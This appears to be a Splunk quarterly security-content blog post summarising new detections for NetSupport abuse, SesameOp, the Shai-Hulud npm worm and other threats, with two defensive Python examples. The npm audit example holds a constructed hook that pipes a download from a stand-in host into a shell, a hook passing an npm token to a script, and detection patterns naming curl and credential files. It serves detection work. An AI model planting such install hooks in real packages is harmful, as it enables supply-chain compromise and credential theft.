Splunk Security Content for Threat Detection & Response: February 2026 Update
Looking for the latest Splunk security content? You’ve come to the right place! This page is updated quarterly with all the latest security content details.
This blog post covers security content developed November 2025 - January 2026. Jump straight to the updates below, or read on to learn more about:
- How Splunk develops security content
- The types of content we deliver
- How to access security content
Splunk continuously monitors the threat landscape to develop, test, and deliver security content to help identify and respond to vulnerabilities and cyber attacks within your environment.
Types of Security Content
Splunk provides a variety of security content, all of which is designed to help you make the most of your Splunk environment. This includes:
Detections
Splunk’s out-of-the-box detection searches are created to help identify patterns and alert you to threats and anomalous behavior.
Analytic Stories
All detection searches relevant to a particular threat are packaged in the form of analytic stories (also known as use cases).
SOAR Playbook Packs
A collection of pre-built automation playbooks that are designed to help users tackle specific use cases.
How to get Security Content
Take advantage of security content in two ways:
Both apps allow you to deploy over 1,900 out-of-the-box searches to start detecting, investigating and responding to threats. You can also view the full security content repository by visiting research.splunk.com.
And with that information, we can move on to the latest content. Let's take a look!
Splunk Security Content: November 2025 – January 2026
Below you will find a brief table of contents, followed by an overview of the security content developed from February 2025 - April 2025.
Table of Contents
Adversary Tradecraft Analytic Stories
- Kerberos Coercion with DNS
- NetSupport RMM Tool Abuse
- Suspicious Local LLM Frameworks
- Browser Hijacking
- Cisco Isovalent Suspicious Activity
- SesameOp
- Suspicious User Agents
Emerging Threats Analytic Stories
Overview: Adversary Tradecraft Analytic Stories
The Splunk Threat Research Team created several new analytic stories to help identify activity related to various malware threats:
CVE-2025-33073 is a critical vulnerability related to Kerberos reflection attacks impacting Active Directory environments. The story began with a Domain Controller set up in a lab environment where offensive tradecraft was being developed: the attacker used a DNS record manipulation technique, appending a specific "magic string" to the hostname, which ultimately enabled successful coercive authentication and led to remote code execution as SYSTEM.
The STRT released an analytic story for the NetSupport Remote Manager Tool primarily focusing on identifying its misuse, as it's a legitimate tool often leveraged by adversaries. Endpoint detection involves flagging the client32.exe executable running from unusual directories like Downloads or ProgramData instead of its standard Program Files location. Suspicious activity also encompasses renamed binaries with the internal name "client32" communicating with netsupportsoftware.com, or unauthenticated remote control sessions.
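The NetSupport checks described above, expressed as stand-alone logic over constructed process events (an added example, not the STRT's own Splunk search): the install-path prefixes, the event field names and the sample records are assumptions for this illustration.

```python
import ntpath
from typing import Dict, List

# Constructed sample events, loosely shaped like Sysmon process-creation records
# joined with the destination host of any outbound connection. Not real telemetry.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"image": r"C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe",
     "internal_name": "client32", "dest_host": "geo.netsupportsoftware.com"},
    {"image": r"C:\Users\alice\Downloads\client32.exe",
     "internal_name": "client32", "dest_host": ""},
    {"image": r"C:\ProgramData\updater\svchost.exe",
     "internal_name": "client32", "dest_host": "geo.netsupportsoftware.com"},
    {"image": r"C:\Windows\System32\svchost.exe",
     "internal_name": "svchost.exe", "dest_host": ""},
]

# Where a sanctioned NetSupport Manager install normally lives (assumed for this example).
EXPECTED_PREFIXES = (r"c:\program files\netsupport", r"c:\program files (x86)\netsupport")
VENDOR_DOMAIN = "netsupportsoftware.com"


def netsupport_findings(event: Dict[str, str]) -> List[str]:
    """Return the reasons an event looks like NetSupport RMM misuse (empty if none)."""
    image = event["image"].lower()
    basename = ntpath.basename(image)  # ntpath splits Windows paths on any OS
    internal = event.get("internal_name", "").lower()
    host = event.get("dest_host", "").lower()
    in_expected_dir = image.startswith(EXPECTED_PREFIXES)
    findings: List[str] = []
    # 1. The real client32.exe running from somewhere other than its install directory.
    if basename == "client32.exe" and not in_expected_dir:
        findings.append("client32.exe running outside its Program Files install path")
    # 2. A binary whose PE internal name is client32 but whose file name was changed.
    if internal == "client32" and basename != "client32.exe":
        findings.append(f"renamed NetSupport client ({basename}) with internal name client32")
    # 3. Anything identifying as client32 contacting the vendor domain from an unexpected path.
    vendor_contact = host == VENDOR_DOMAIN or host.endswith("." + VENDOR_DOMAIN)
    if internal == "client32" and vendor_contact and not in_expected_dir:
        findings.append(f"NetSupport check-in to {host} from unexpected path {image}")
    return findings


def triage(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Keep only events with at least one finding, with their reasons attached."""
    return [{"image": e["image"], "findings": f}
            for e in events if (f := netsupport_findings(e))]


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["image"], "->", "; ".join(hit["findings"]))
```

The sanctioned install (first event) produces no finding, which is the property to preserve when tuning the path allowlist for your own environment.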
This analytic story addresses the growing security challenge of Shadow AI - the deployment and use of unauthorized Large Language Model (LLM) frameworks and AI tools within enterprise environments without proper governance, oversight, or security controls. Shadow AI deployments pose significant risks including data exfiltration through local model inference (where sensitive corporate data is processed by unmonitored AI systems), intellectual property leakage, policy violations, and creation of security blind spots that bypass enterprise data loss prevention and monitoring solutions.
The Browser Hijacking analytic story detects behaviors associated with browser hijacking techniques where malware manipulates browser configurations, preferences, or registry settings to alter browsing behavior, disable updates, and install unauthorized extensions. Modern hijackers may directly modify Chrome preference files, use automation to inject unwanted content, or change policy settings (including allowlisting extensions) to persist and evade standard protections.
Cisco Isovalent Suspicious Activity focuses on identifying suspicious activities and potential security threats within environments using Cisco Isovalent in Kubernetes. It provides detection analytics and guidance to help security teams recognize signs of adversary tactics such as unauthorized access attempts, unusual network activity, and other behaviors indicative of potential compromise in their Kubernetes environments.
SesameOp is a Backdoor that abuses the OpenAI Assistants API as its command-and-control (C2) channel. Instead of using a traditional malicious server infrastructure, the malware loads a heavily obfuscated .NET DLL (Netapi64.dll / OpenAIAgent.Netapi64) which reaches out to the Assistants API to fetch encrypted, compressed commands and then executes them on the infected host.
Suspicious User Agents leverages advanced Splunk searches to detect and investigate suspicious user agent strings on the network, including malware, command and control frameworks, RMM software, and other unwanted programs.
Overview: Emerging Threats Analytic Stories
The STRT released an analytic story to detect npm supply chain compromises, including the Shai-Hulud worm and its 2.0 variant. Recent incidents highlight self-replicating worms ("Shai-Hulud" and "Shai-Hulud 2.0") abusing the npm ecosystem. After compromising developer credentials, malicious packages execute during preinstall/postinstall phases to exfiltrate secrets, plant malicious GitHub Actions workflows, register self-hosted runner backdoors, and republish tampered packages to spread across the ecosystem.
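The install-hook behaviour described above is visible in a package's package.json before anything runs. As an added example (not the STRT's detection logic), this audits the npm lifecycle hooks of a package manifest; the hook list, the regular expressions and the two constructed manifests are this example's own assumptions.

```python
import json
import re
from typing import Dict, List

# Lifecycle hooks npm runs automatically during install; the worm abuses preinstall/postinstall.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Command fragments that a legitimate install step rarely needs (assumed heuristics).
RISKY_PATTERNS = {
    "downloads content": re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b", re.I),
    "runs bundled script": re.compile(r"\b(node|bun|sh|bash|powershell)\s+\S+\.(js|mjs|sh|ps1)\b", re.I),
    "touches credentials": re.compile(r"(\.npmrc|NPM_TOKEN|GITHUB_TOKEN|AWS_|\.ssh)", re.I),
    "encoded or dynamic code": re.compile(r"(base64|eval\()", re.I),
}


def audit_package_json(text: str) -> List[Dict[str, str]]:
    """Return one finding per install hook in a package.json that matches a risky pattern."""
    scripts = json.loads(text).get("scripts", {})
    findings: List[Dict[str, str]] = []
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        reasons = [label for label, rx in RISKY_PATTERNS.items() if rx.search(cmd)]
        if reasons:
            findings.append({"hook": hook, "command": cmd, "reasons": ", ".join(reasons)})
    return findings


# Constructed manifests: a benign native-addon build step, and hooks shaped like the
# download-and-execute plus credential access behaviour the analytic story targets.
BENIGN = json.dumps({"name": "pad-utils", "scripts": {"test": "jest", "install": "node-gyp rebuild"}})
SUSPECT = json.dumps({"name": "totally-fine-utils", "scripts": {
    "preinstall": "node setup_env.js && curl -s https://example.invalid/payload | sh",
    "postinstall": "node collect.js $NPM_TOKEN"}})

if __name__ == "__main__":
    for label, manifest in (("benign", BENIGN), ("suspect", SUSPECT)):
        for f in audit_package_json(manifest):
            print(f"[{label}] {f['hook']}: {f['reasons']} :: {f['command']}")
```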
Tuoni is a sophisticated, cross-platform red teaming framework designed to enhance cybersecurity education and training through large-scale cyber defense exercises. The team also released an analytic story on Castle RAT, which helps you detect and investigate unusual activity that may be related to this remote access trojan observed in targeted intrusion campaigns.
PromptFlux is a POC malware sample that abuses Gemini-like services for command-and-control operations. It achieves persistence by dropping executables or scripts in startup folders and frequently accesses the Gemini API using hard-coded keys or unauthorized requests, often from non-standard processes. The STRT also released the analytic story React2Shell (CVE-2025-55182), covering a critical pre-authentication Remote Code Execution (RCE) vulnerability in React Server Components.
The team also published the following blogs:
- PromptLock PoC Ransomware: Lessons and Key Takeaways
- Behind the Walls: Techniques and Tactics in Castle RAT Client Malware
- Defending Against npm Supply Chain Attacks: A Practical Guide to Detection, Emulation, and Analysis
- Splunking Isovalent Data: Initial Setup and Overview
- TOTAL-REPLAY: The Bridge to Replay Attacks Using the Security Content Metadata
Previous Security Content Roundups
Looking for previous security content updates? Check out the previous quarters of security content roundups from the Splunk Threat Research Team. Stay tuned to that page and this one — we're updating them every quarter!